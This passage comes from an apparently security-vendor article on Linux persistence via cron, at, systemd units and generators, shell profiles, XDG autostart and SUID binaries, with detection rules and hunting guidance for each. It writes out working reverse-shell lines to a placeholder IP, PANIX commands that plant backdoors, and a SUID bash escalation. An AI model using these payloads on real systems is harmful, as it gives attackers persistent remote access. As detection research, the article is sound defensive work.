It is a [daemon](https://man7.org/linux/man-pages/man7/daemon.7.html) (that is, a background process that typically performs tasks without requiring user interaction) that reads cron files from a default set of locations. These files contain commands to run periodically and/or at a scheduled time.\n\nThe scheduled task is called a cron job and can be executed with both user and root permissions, depending on the configuration. Due to its versatility, cron is an easy and stable candidate for Linux persistence, even without escalating to root privileges upon initial access. \n\nThere are user-specific and system-wide cron jobs. The user-specific cron jobs commonly reside in:\n\n* `/var/spool/cron/`\n* `/var/spool/cron/crontabs/`\n\nThe system-wide cron jobs are located in the following:\n\n* `/etc/crontab`\n* `/etc/cron.d/`\n* `/etc/cron.daily/`\n* `/etc/cron.hourly/`\n* `/etc/cron.monthly/`\n* `/etc/cron.weekly/`\n\nThe cron file syntax slightly differs based on the location in which the cron file is created. For the cron files in the `/etc/` directory, the user who will execute the job must be specified.\n\n```\n* * * * * root /bin/bash -c '/srv/backup_tool.sh'\n```\n\nConversely, the user who created the cron files in the `/var/spool/cron/crontabs/` directory will execute the cron files.\n\n```\n* * * * * /bin/bash -c '/srv/backup_tool.sh'\n```\n\nThe asterisks are used to create the schedule. They represent (in order) minutes, hours, days (of the month), months, and days (of the week). Setting “`* * * * *`” means the cron job is executed every minute, while setting “`* * 1 12 *`” means the cron job is executed every minute on the first day of December. 
Information on cron scheduling is available at [Crontab Guru](https://crontab.guru/).\n\nAttackers can exploit these jobs to run scripts or binaries that establish reverse connections or add reverse shell commands.\n\n```\n* * * * * root /bin/bash -c 'sh -i >& /dev/tcp/192.168.1.1/1337 0>&1'\n```\n\nMITRE specifies more information and real-world examples related to this technique in [T1053.003](https://attack.mitre.org/techniques/T1053/003/).\n\n#### Persistence through T1053.003 - cron\n\nYou can manually create a system-wide cron file in any of the `/etc/` directories or use the `crontab -e` command to create a user-specific cron file. To more easily illustrate all of the persistence mechanisms presented in these articles, we will use PANIX. Depending on the privileges when running it, you can establish persistence like so:\n\n```\nsudo ./panix.sh --cron --default --ip 192.168.1.1 --port 2001\n[+] Cron job persistence established.\n```\n\nThe default setting for the root user will create a cron file at `/etc/cron.d/freedesktop_timesync1` that calls out to the attacker system every minute. When looking at the events, we can see the following:\n\n\n\nWhen PANIX was executed, the cron job was created, `/usr/sbin/cron` read the contents of the cron file and executed it, after which a network connection was established. Analyzing this chain of events, we can identify several detection capabilities for this and other proof-of-concepts.\n\nElastic SIEM includes over 1,000 prebuilt rules and more than 200 specifically dedicated to Linux. These rules run on the Elastic cluster and are designed to detect threat techniques that are available in our public [detection rules repository](https://github.com/elastic/detection-rules/tree/main). 
Our prevention capabilities include behavioral endpoint rules and memory/file signatures, which are utilized by Elastic Defend and can be found in our public [protection artifacts repository](https://github.com/elastic/protections-artifacts). \n\n| Category | Coverage |\n|----------|----------------------------------------------------|\n| File | [Cron Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_cron_job_creation.toml) |\n| | [Suspicious File Creation in /etc for Persistence](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_etc_file_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Hidden Payload Executed via Scheduled Job](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_hidden_payload_executed_via_scheduled_job.toml) |\n| | [Scheduled Job Executing Binary in Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_job_executing_binary_in_unusual_location.toml) |\n| | [Scheduled Task Unusual Command Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_task_unusual_command_execution.toml) |\n\nThe file category has three different rules, the first two focusing on creation/modification using Elastic Defend, while the third focuses on modification through [File Integrity Monitoring (FIM)](https://www.elastic.co/docs/current/integrations/fim). FIM can be set up using [Auditbeat](https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-file_integrity.html) or via the Fleet integration. To correctly set up FIM, it is important to specify full paths to the files that FIM should monitor, as it does _not_ allow for wildcards. 
Therefore, Potential Persistence via File Modification is a rule that requires manual setup and tailoring to your specific needs, as it will require individual entries depending on the persistence technique you are trying to detect.\n\n### T1053.002 - scheduled task/job: at\n\n[At](https://man7.org/linux/man-pages/man1/at.1p.html) is a utility for scheduling one-time tasks to run at a specified time in the future on Linux systems. Unlike cron, which handles recurring tasks, At is designed for single executions. The At daemon (`atd`) manages and executes these scheduled tasks at the specified time.\n\nAn At job is defined by specifying the exact time it should run. Depending on the configuration, users can schedule At jobs with either user or root permissions. This makes At a straightforward option for scheduling tasks without the need for persistent or repeated execution, but less useful for attackers. Additionally, At is not present on most Linux distributions by default, which makes leveraging it even less trivial. However, it is still used for persistence, so we should not neglect the technique.\n\nAt jobs are stored in `/var/spool/cron/atjobs/`. Besides the At job, At also creates a spool file in the `/var/spool/cron/atspool/` directory. These job files contain the details of the scheduled tasks, including the commands to be executed and the scheduled times. \n\nTo schedule a task using At, you simply provide the command to run and the time for execution. The syntax is straightforward:\n\n```\necho \"/bin/bash -c 'sh -i >& /dev/tcp/192.168.1.1/1337 0>&1'\" | at now + 1 minute\n```\n\nThe above example schedules a task to run one minute from the current time. The time format can be flexible, such as `at 5 PM tomorrow` or `at now + 2 hours`. 
At job details can be listed using the `atq` command, and specific jobs can be removed using `atrm`.\n\nAt is useful for one-time task scheduling and complements cron for users needing recurring and single-instance task scheduling solutions. MITRE specifies more information and real-world examples related to this technique in [T1053.002](https://attack.mitre.org/techniques/T1053/002/).\n\n#### Persistence through T1053.002 - At\n\nYou can leverage the above command structure or use PANIX to set up an At job. Ensure At is installed on your system and the time settings are correct, as this might interfere with the execution. \n\n```\n./panix.sh --at --default --ip 192.168.1.1 --port 2002 --time 14:49\njob 15 at Tue Jun 11 14:49:00 2024\n[+] At job persistence established.\n```\n\nBy default, depending on the privileges used to run the program, a reverse connection will be established at the time interval the user specified. Looking at the events in Discover:\n\n\n\nWe see the execution of PANIX, which is creating the At job. Next, At(d) creates two files, an At job and an At spool. At the correct time interval, the At job is executed, after which the reverse connection to the attack IP is established. Looking at these events, we have fewer behavioral coverage opportunities than we have for cron, as behaviorally, it is just `/bin/sh` executing a shell command. 
However, we can still identify the following artifacts:\n\n| Category | Coverage |\n|----------|---------------------------------------------|\n| File | [At Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_at_job_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n\n### T1053 - scheduled task/job: honorable mentions\n\nSeveral other honorable mentions for establishing persistence through scheduled tasks/jobs include [Anacron](https://www.man7.org/linux/man-pages/man8/anacron.8.html), [Fcron](https://man.archlinux.org/man/fcron.8.en), [Task Spooler](https://manpages.ubuntu.com/manpages/xenial/man1/tsp.1.html), and [Batch](https://man7.org/linux/man-pages/man1/batch.1p.html). While these tools are less commonly leveraged by malware due to their non-default installation and limited versatility compared to cron and other mechanisms, they are still worth noting. We include behavioral detection rules for some of these in our persistence rule set. For example, Batch jobs are saved in the same location as At jobs and are covered by our \"[At Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_at_job_creation.toml)\" rule. Similarly, Anacron jobs are covered through our \"[Cron Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_cron_job_creation.toml)\" rule, as Anacron integrates with the default Cron persistence detection setup.\n\n### Hunting for T1053 - scheduled task/job \n\nBesides relying on Elastic’s pre-built [detection](https://github.com/elastic/detection-rules) and [endpoint rules](https://github.com/elastic/protections-artifacts), a defender will greatly benefit from manual threat hunting. 
As part of Elastic’s 8.14 release, the general availability of the [Elasticsearch Query Language (ES|QL)](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) was introduced. ES|QL provides a powerful way to filter, transform, and analyze data stored in Elasticsearch. For this use case, we will leverage ES|QL to hunt through all the data in an Elasticsearch stack for traces of cron, At, Anacron, Fcron, Task Spooler, and Batch persistence. \n\nWe can leverage the following ES|QL query that can be tailored to your specific environment:\n\nThis query returns 76 hits that could be investigated. Some are related to PANIX, others to real malware detonations, and some are false positives. \n\n\n\nDealing with false positives is crucial, as system administrators and other authorized personnel commonly use these tools. Differentiating between legitimate and malicious use is essential for maintaining an effective security posture. Accurately identifying the intent behind using these tools helps minimize disruptions caused by false alarms while ensuring that potential threats are addressed promptly.\n\nPrograms similar to cron also have an execution history, as all of the scripts cron executes will have cron as their parent. This allows us to hunt for unusual process executions through ES|QL:\n\nThis example performs aggregation using a `distinct_count` of `host.id`. If an anomalous entry is observed, `host_count` can be removed, and additional fields such as `host.name` and `user.name` can be added to the `by` section. This can help find anomalous behavior on specific hosts rather than across the entire environment. This could also be an additional pivoting opportunity if suspicious processes are identified. \n\nIn this case, the query returns 37 results, most of which are true positives due to the nature of the testing stack in which this is executed. \n\n\n\nIn your environment, this will likely return a massive number of results. 
You may consider reducing/increasing the number of days that are being searched. Additionally, the total count of entries (`cc`) and `host_count` can be increased/decreased to make sense for your environment. Every network is unique; therefore, a false positive in one environment may not be a false positive in another. Adding exclusions specific to your needs will allow for easier hunting.\n\nBesides ES|QL, we can also leverage Elastic’s [OSQuery Manager integration](https://www.elastic.co/docs/current/integrations/osquery_manager). OSQuery is an open-source, cross-platform tool that uses SQL queries to investigate and monitor the operating system's performance, configuration, and security by exposing system information as a relational database. It allows administrators and security professionals to easily query system data and create real-time monitoring and analytics solutions. Streaming telemetry represents activity over time, while OSQuery focuses on static on-disk presence. This opens the door for detecting low-and-slow/decoupled-style attacks and might catch otherwise missed activity through telemetry hunting. \n\nInformation on how to set up OSQuery can be found in the [Kibana docs](https://www.elastic.co/guide/en/kibana/current/osquery.html), and a blog post explaining OSQuery in depth can be found [here](https://www.elastic.co/blog/gain-upper-hand-over-adversaries-with-osquery-and-elastic). We can run the following live query to display all of the cron files present on a particular system:\n\nThe following results are returned. We can see the `/etc/cron.d/freedesktop_timesync1` with a `file_last_status_change_time` that is recent and differs from the rest of the cron files. 
This is the backdoor planted by PANIX. \n\n\n\nIf we want to dig deeper, OSQuery also provides a module to read the commands from the crontab file by running the following query:\n\nThis shows us the command, the location of the cron job, and the corresponding schedule at which it runs. \n\n\n\nAnalyzing the screenshot, we see two suspicious reverse shell entries, which could require additional manual investigation. \n\nAn overview of the hunts outlined above, with additional descriptions and references, can be found in our [detection rules repository](https://github.com/elastic/detection-rules), specifically in the [Linux hunting subdirectory](https://github.com/elastic/detection-rules/tree/main/hunting). We can hunt for uncommon scheduled task file creations or unusual process executions through scheduled task executables by leveraging ES|QL and OSQuery. The [Persistence via Cron](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_cron.toml) hunt contains several ES|QL and OSQuery queries to aid this process.\n\n## T1543 - create or modify system process (systemd)\n\n[Systemd](https://man7.org/linux/man-pages/man1/init.1.html) is a system and service manager for Linux, widely adopted as a replacement for the traditional [SysVinit](https://manpages.debian.org/testing/sysvinit-core/init.8.en.html) system. It is responsible for initializing the system, managing processes, and handling system resources. Systemd operates through a series of unit files defining how services should be started, stopped, and managed.\n\n[Unit files](https://manpages.debian.org/jessie/systemd/systemd.unit.5.en.html) have different types, each designed for specific purposes. The Service unit is the most common unit type for managing long-running processes (typically daemons). Additionally, the Timer unit manages time-based activation of other units, similar to cron jobs, but integrated into Systemd. 
\n\nThis section will discuss [T1543](https://attack.mitre.org/techniques/T1543/) for systemd services and generators, and [T1053](https://attack.mitre.org/techniques/T1053/) for systemd timers.\n\n### T1543.002 - create or modify system process: systemd services\n\nThe [services](https://www.digitalocean.com/community/tutorials/understanding-systemd-units-and-unit-files) managed by systemd are defined by unit files and are located in default directories, depending on the operating system and whether the service is run system-wide or user-specific. The system-wide unit files are typically located in the following directories:\n\n* `/run/systemd/system/`\n* `/etc/systemd/system/`\n* `/etc/systemd/user/`\n* `/usr/local/lib/systemd/system/`\n* `/lib/systemd/system/`\n* `/usr/lib/systemd/system/`\n* `/usr/lib/systemd/user/`\n\nUser-specific unit files are typically located at:\n\n* `~/.config/systemd/user/`\n* `~/.local/share/systemd/user/`\n\nA basic service unit file consists of three main sections: `[Unit]`, `[Service]`, and `[Install]`, and has the `.service` extension. Here's an example of a simple unit file that could be leveraged for persistence:\n\n```\n[Unit]\nDescription=Reverse Shell\n\n[Service]\nExecStart=/bin/bash -c 'sh -i >& /dev/tcp/192.168.1.1/1337 0>&1'\n\n[Install]\nWantedBy=multi-user.target\n```\n\nThis unit file would attempt to establish a reverse shell connection every time the system boots, running with root privileges. More information and real-world examples related to systemd services are outlined by MITRE in [T1543.002](https://attack.mitre.org/techniques/T1543/002/).\n\nRelying solely on persistence upon reboot might be too restrictive. 
Timer unit files can be leveraged to overcome this limitation to ensure persistence on a predefined schedule.\n\n### T1053.006 - scheduled task/job: systemd timers\n\n[Timer units](https://wiki.archlinux.org/title/systemd/Timers) provide a versatile method to schedule tasks, similar to cron jobs but more integrated with the Systemd ecosystem. A timer unit specifies the schedule and is associated with a corresponding service unit that performs the task. Timer units can run tasks at specific intervals, on specific dates, or even based on system events.\n\nTimer unit files are typically located in the same directories as the service unit files and have a `.timer` extension. Coupling timers to services is done by leveraging the same unit file name but changing the extension. An example of a timer unit file that would activate our previously created service every hour can look like this:\n\n```\n[Unit]\nDescription=Obviously not malicious at all\n\n[Timer]\nOnBootSec=1min\nOnUnitActiveSec=1h\n\n[Install]\nWantedBy=timers.target\n```\n\nTimers are versatile and allow for different scheduling options. Some examples are `OnCalendar=Mon,Wed,Fri 17:00:00` to run a service every Monday, Wednesday, and Friday at 5:00 PM, and `OnCalendar=*-*-* 02:30:00` to run a service every day at 2:30 AM. More details and real-world examples related to Systemd timers are presented by MITRE in [T1053.006](https://attack.mitre.org/techniques/T1053/006/).\n\n### T1543 - create or modify system process: systemd generators\n\n[Generators](https://manpages.debian.org/testing/systemd/systemd.generator.7.en.html) are small executables executed by systemd at bootup and during configuration reloads. 
Their main role is to convert non-native configuration and execution parameters into dynamically generated unit files, symlinks, or drop-ins, extending the unit file hierarchy for the service manager.\n\nSystem and user generators are loaded from the `system-generators/` and `user-generators/` directories, respectively, with those listed earlier overriding others of the same name. Generators produce output in three priority-based directories: `generator.early` (highest), `generator` (medium), and `generator.late` (lowest). Reloading daemons will re-run all generators and reload all units from disk.\n\nSystem-wide generators can be placed in the following directories:\n\n* `/run/systemd/system-generators/`\n* `/etc/systemd/system-generators/`\n* `/usr/local/lib/systemd/system-generators/`\n* `/lib/systemd/system-generators/`\n* `/usr/lib/systemd/system-generators/`\n\nUser-specific generators are placed in the following directories:\n\n* `/run/systemd/user-generators/`\n* `/etc/systemd/user-generators/`\n* `/usr/local/lib/systemd/user-generators/`\n* `/lib/systemd/user-generators/`\n* `/usr/lib/systemd/user-generators/`\n\n[Pepe Berba's research](https://pberba.github.io/security/2022/02/07/linux-threat-hunting-for-persistence-systemd-generators/) explores using systemd generators to establish persistence. One method involves using a generator to create a service file that triggers a backdoor on boot. Alternatively, the generator can execute the backdoor directly, which can cause delays if the network service is not yet started, alerting the user. Systemd generators can be binaries or shell scripts. 
For example, a payload could look like this:\n\n```\n#!/bin/sh\n# Create a systemd service unit file in the late directory\ncat <<-EOL > \"/run/systemd/system/generator.service\"\n[Unit]\nDescription=Generator Service\n\n[Service]\nExecStart=/usr/lib/systemd/system-generators/makecon\nRestart=always\nRestartSec=10\n\n[Install]\nWantedBy=multi-user.target\nEOL\n\nmkdir -p /run/systemd/system/multi-user.target.wants/\nln -s /run/systemd/system/generator.service /run/systemd/system/multi-user.target.wants/generator.service\n\n# Ensure the script exits successfully\nexit 0\n```\n\nThis creates a new service (`generator.service`), which in turn executes `/usr/lib/systemd/system-generators/makecon` on boot. As this method creates a service (albeit via a generator), we will take a closer look at systemd service persistence. Let's examine how these work in practice.\n\n### Persistence through T1543/T1053 - systemd services, timers and generators\n\nYou can manually create the unit file in the appropriate directory, reload the daemon, enable and start the service, or use PANIX to do that for you. PANIX will create a service unit file in the specified directory, which in turn runs the custom command at a one-minute interval through a timer unit file. You can also use `--default` with `--ip`, `--port`, and `--timer`.\n\n```\nsudo ./panix.sh --systemd --custom --path /etc/systemd/system/panix.service --command \"/usr/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.1/2003 0>&1'\" --timer\nService file created successfully!\nCreated symlink /etc/systemd/system/default.target.wants/panix.service → /etc/systemd/system/panix.service.\nTimer file created successfully!\nCreated symlink /etc/systemd/system/timers.target.wants/panix.timer → /etc/systemd/system/panix.timer.\n[+] Persistence established. \n```\n\nWhen a service unit is enabled, systemd creates a symlink in the `default.target.wants/` directory (or another appropriate target directory). 
This tells systemd to start the `panix.service` automatically when the system reaches the `default.target`. Similarly, the symlink for the timer unit file tells systemd to activate the timer based on the schedule defined in the timer unit file.\n\nWe can analyze and find out what happened when looking at the documents in Kibana: \n\n\n\nPANIX is executed, which creates the `panix.service` and `panix.timer` units in the corresponding directories. Then, `systemctl` is used to reload the daemons, after which the `panix.timer` is enabled and started, enabling systemd to run the `ExecStart` section of the service unit (which initiates the outbound network connection) every time the timer hits. To detect potential systemd persistence, we leverage the following behavioral rules:\n\n| Category | Coverage |\n|----------|----------------------------------------------------|\n| File | [Systemd Service Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_service_creation.toml) |\n| | [Systemd Timer Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_scheduled_timer_created.toml) |\n| | [Systemd Generator Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_generator_creation.toml) |\n| | [Suspicious File Creation in /etc for Persistence](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_etc_file_creation.toml) |\n| Process | [Systemd Service Started by Unusual Parent Process](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_service_started.toml) |\n| | [Hidden Payload Executed via Scheduled Job](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_hidden_payload_executed_via_scheduled_job.toml) |\n| | [Scheduled Job Executing Binary in Unusual 
Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_job_executing_binary_in_unusual_location.toml) |\n| | [Scheduled Task Unusual Command Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_task_unusual_command_execution.toml) |\n\n### Hunting for T1053/T1543 - systemd services, timers and generators\n\nWe can hunt for uncommon `service`/`timer`/`generator` file creations in our environment through systemd by leveraging ES|QL and OSQuery. The [Persistence via Systemd (Timers)](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_systemd_timers.toml) file contains several ES|QL and OSQuery queries that can help hunt for these types of persistence.\n\n## T1546.004 - event triggered execution: Unix shell configuration modification\n\n[Unix shell configuration files](https://effective-shell.com/part-5-building-your-toolkit/configuring-the-shell/) are scripts that run throughout a user session based on events (e.g., log in/out, or open/close a shell session). These files are used to customize the shell environment, including setting environment variables, aliases, and other session-specific settings. As these files are executed via a shell, they can easily be leveraged by attackers to establish persistence on a system by injecting backdoors into these scripts. \n\nDifferent shells have their own configuration files. Similarly to cron and systemd, this persistence mechanism can be established with both user and root privileges. Depending on the shell, system-wide shell configuration files are located in the following locations and require root permissions to be changed:\n\n* `/etc/profile`\n* `/etc/profile.d/`\n* `/etc/bash.bashrc`\n* `/etc/bash.bash_logout`\n\nUser-specific shell configuration files are triggered through actions performed by and executed in the user's context. 
Depending on the shell, these typically include:\n\n* `~/.profile`\n* `~/.bash_profile`\n* `~/.bash_login`\n* `~/.bash_logout`\n* `~/.bashrc`\n\nOnce modified, these scripts ensure malicious commands are executed for every user login or logout. These scripts are executed in a [specific order](https://www.thegeekstuff.com/2008/10/execution-sequence-for-bash_profile-bashrc-bash_login-profile-and-bash_logout/). When a user logs in via SSH, the order of execution for the login shells is:\n\n1. `/etc/profile`\n2. `~/.bash_profile` (if it exists, otherwise)\n3. `~/.bash_login` (if it exists, otherwise)\n4. `~/.profile` (if it exists)\n\nFor non-login interactive shell initialization, `~/.bashrc` is executed. Typically, to ensure this configuration file is also executed on login, `~/.bashrc` is sourced within `~/.bash_profile`, `~/.bash_login` or `~/.profile`. Additionally, a backdoor can be added to the `~/.bash_logout` configuration file for persistence upon shell termination. \n\nWhen planting a backdoor in one of these files, it is important not to make mistakes in the execution chain, meaning that it is both important to pick the correct configuration file and to pick a fitting payload. A typical reverse shell connection will make the terminal freeze while sending the reverse shell connection to the background will make it malfunction. A potential payload could look like this:\n\n```\n(nohup bash -i > /dev/tcp/192.168.1.1/1337 0<&1 2>&1 &)\n```\n\nThis command uses “nohup” (no hang up) to run an interactive bash reverse shell as a background process, ensuring it continues running even after the initiating user logs out. 
The entire command is then executed in the background using `&` and wrapped in parentheses to create a subshell, preventing any interference with the parent shell’s operations.\n\nBe vigilant for other types of backdoors, such as credential stealers that create fake “`[sudo] password for…`” prompts when running sudo or the execution of malicious binaries. MITRE specifies more information and real-world examples related to this technique in [T1546.004](https://attack.mitre.org/techniques/T1546/004/).\n\n### Persistence through T1546.004 - shell profile modification\n\nYou can add a bash payload to shell configuration files either manually or using PANIX. When PANIX runs with user privileges, it establishes persistence by modifying `~/.bash_profile`. With root privileges, it modifies the `/etc/profile` file to achieve system-wide persistence.\n\n```\nsudo ./panix.sh --shell-profile --default --ip 192.168.1.1 --port 2004\n```\n\nTo trigger it, either log in as root via the shell with `su --login root` or login via SSH. The shell profile will be parsed and executed in order, resulting in the following chain of execution:\n\n\n\nPANIX plants the backdoor in `/etc/profile`, next `su --login root` is executed to trigger the payload, the `UID`/`GID` changes to root, and a network connection is initiated through the injected backdoor. A similar process occurs when logging in via SSH. We can detect several steps of the attack chain. 
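For testing in a lab, the user-level variant of this backdoor can also be planted by hand; a minimal sketch, assuming a disposable test system (the IP and port are placeholders matching the payload above):

```
# Append the backgrounded reverse-shell payload to the user's login profile
# (192.168.1.1:1337 is a placeholder attacker listener)
PAYLOAD='(nohup bash -i > /dev/tcp/192.168.1.1/1337 0<&1 2>&1 &)'
echo "$PAYLOAD" >> ~/.bash_profile

# Confirm the backdoor is in place; it fires on the next login shell
grep -nF 'nohup bash -i' ~/.bash_profile
```

The resulting modification of `~/.bash_profile` should generate the file events that the rules below key on.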
\n\nDetection and endpoint rules that cover shell profile modification persistence:\n\n| Category | Coverage |\n|----------|--------------------------------------------------------------|\n| File | [Shell Configuration Creation or Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_shell_configuration_modification.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Binary Execution from Unusual Location through Shell Profile](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_binary_execution_from_unusual_location_through_shell_profile.toml) |\n| Network | [Network Connection through Shell Profile](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_network_connection_through_shell_profile.toml) |\n\n### Hunting for T1546.004 - shell configuration modification\n\nWe can hunt for shell profile file creations/modifications, as well as SSHD child processes, by leveraging ES|QL and OSQuery. The [Shell Modification Persistence](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_shell_modification_persistence.toml) hunting rule contains several of these hunting queries.\n\n## T1547.013 - boot or logon autostart execution: XDG autostart entries\n\nCross-Desktop Group (XDG) is a set of [standards for Unix desktop environments](https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html) that describe how applications should be started automatically when a user logs in. 
The XDG Autostart specification is particularly interesting, as it defines a way to automatically launch applications based on desktop entry files, which are plain text files with the `.desktop` extension.\n\nThe `.desktop` files are typically used to configure how applications appear in menus and how they are launched. By leveraging XDG Autostart, attackers can configure malicious applications to run automatically whenever users log into their desktop environment.\n\nThe location where these files can be placed varies based on whether the persistence is being established for all users (system-wide) or a specific user. It also depends on the desktop environment used; for example, KDE uses different configuration locations than GNOME. Default system-wide autostart files are located in directories that require root permissions to modify, such as:\n\n* `/etc/xdg/autostart/`\n* `/usr/share/autostart/`\n\nDefault user-specific autostart files, other than the root user-specific autostart file, only require user-level permissions. These are typically located in:\n\n* `~/.config/autostart/`\n* `~/.local/share/autostart/`\n* `~/.config/autostart-scripts/` (not part of the XDG standard, but used by KDE)\n* `/root/.config/autostart/`\n* `/root/.local/share/autostart/`\n* `/root/.config/autostart-scripts/`\n\nAn example of a `.desktop` file that executes a binary whenever a user logs in looks like this:\n\n```\n[Desktop Entry]\nType=Application\nExec=/path/to/malicious/binary\nHidden=false\nNoDisplay=false\nX-GNOME-Autostart-enabled=true\nName=Updater\n```\n\nVolexity recently published research on [DISGOMOJI](https://www.volexity.com/blog/2024/06/13/disgomoji-malware-used-to-target-indian-government/) malware, which was found to establish persistence by dropping a `.desktop` file in the `~/.config/autostart/` directory that would execute a malicious backdoor planted on the system. 
As it can be established with both user/root privileges, it is an interesting candidate for automated persistence implementations. Additionally, more information and real-world examples related to this technique are specified by MITRE in [T1547.013](https://attack.mitre.org/techniques/T1547/013/).\n\n### Persistence through T1547.013 - Cross-Desktop Group (XDG)\n\nYou can determine coverage and dynamically analyze this technique manually or through PANIX. When analyzing this technique, make sure XDG is available on your testing system, as it is primarily designed for systems with a GUI (although XDG can technically be used without one). When PANIX runs with user privileges, it establishes persistence by modifying `~/.config/autostart/user-dirs.desktop` to execute `~/.config/autostart/.user-dirs` and achieve user-specific persistence. With root privileges, it modifies `/etc/xdg/autostart/pkc12-register.desktop` to execute `/etc/xdg/pkc12-register` and achieve system-wide persistence.\n\n```\nsudo ./panix.sh --xdg --default --ip 192.168.1.1 --port 2005\n[+] XDG persistence established.\n```\n\nAfter rebooting the system and collecting the logs, the following events will be present for a GNOME-based system.\n\n\n\nWe can see PANIX creating the `/etc/xdg/autostart` directory and the `pkc12-register` and `pkc12-register.desktop` files. It grants execution privileges to the backdoor script, after which persistence is established. When the user logs in, the `.desktop` files are parsed, and `/usr/libexec/gnome-session-binary` executes its contents, which in turn initiates the reverse shell connection. Here, again, we can detect several parts of the attack chain. 
\n\n| Category | Coverage |\n|----------|-------------------------------------------------------------------|\n| File | [Persistence via KDE AutoStart Script or Desktop File Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_kde_autostart_modification.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Network | [Network Connections Initiated Through XDG Autostart Entry](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_xdg_autostart_netcon.toml) |\n\nAgain, the file category has two different rules: the former focuses on creation/modification using Elastic Defend, while the latter focuses on modification through FIM.\n\n### Hunting for T1547.013 - XDG autostart entries\n\nHunting for persistence through XDG involves XDG `.desktop` file creations in known locations and unusual child processes spawned from a session-manager parent through ES|QL and OSQuery. The [XDG Persistence](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_xdg_autostart_modifications.toml) hunting rule contains several queries to hunt for XDG persistence.\n\n## T1548.001 - abuse elevation control mechanism: setuid and setgid\n\n[Set Owner User ID (SUID)](https://man7.org/linux/man-pages/man2/setuid.2.html) and [Set Group ID (SGID)](https://man7.org/linux/man-pages/man2/setgid.2.html) are Unix file permissions allowing users to run executables with the executable’s owner or group permissions, respectively. When the SUID bit is set on an executable owned by the root user, any user running the executable gains root privileges. Similarly, when the SGID bit is set on an executable, it runs with the permissions of the group that owns the file. 
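The effect of these bits is directly visible in the file mode. A quick, harmless sketch (using a copy of `ls` rather than a real target binary; `stat -c` assumes GNU coreutils):

```
# Copy a harmless binary and set the SUID bit on the copy
cp /bin/ls ./suid-demo
chmod u+s ./suid-demo

# The owner-execute slot now shows 's' instead of 'x', e.g. -rwsr-xr-x
ls -l ./suid-demo

# Numeric mode: the 4000 (SUID) bit is set, e.g. 4755
stat -c '%a' ./suid-demo
```

Because this copy is owned by the unprivileged user who created it, it grants no extra privileges; a real SUID backdoor additionally requires the file to be owned by root.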
\n\nTypical targets for SUID and SGID backdoors include common system binaries like `find`, `vim`, or `bash`, frequently available and widely used. [GTFOBins](https://gtfobins.github.io/#+suid) provides a list of common Unix binaries that can be exploited to obtain a root shell or unauthorized file reads. System administrators must be cautious when managing SUID and SGID binaries, as improperly configured permissions can lead to significant security vulnerabilities. \n\nTo exploit this, either a misconfigured SUID or SGID binary must be present on the system, or root-level privileges must be obtained to create a backdoor. Typical privilege escalation enumeration scripts enumerate the entire filesystem for the presence of these binaries using `find`. \n\nSUID and SGID binaries are common on Linux and are available on the system by default. Generally, these cannot be exploited. An example of a misconfigured SUID binary looks like this:\n\n```\nfind / -perm -4000 -type f -exec ls -la {} \\;\n-rwsr-sr-x 1 root root 1396520 Mar 14 11:31 /bin/bash\n```\n\nThe `/bin/bash` binary is not a default SUID binary and causes a security risk. An attacker could now run `/bin/bash -p` to run bash and keep the root privileges on execution. More information on this is available at [GTFOBins](https://gtfobins.github.io/gtfobins/bash/). Although MITRE defines this as privilege escalation/defense evasion, it can (as shown) be used for persistence as well. 
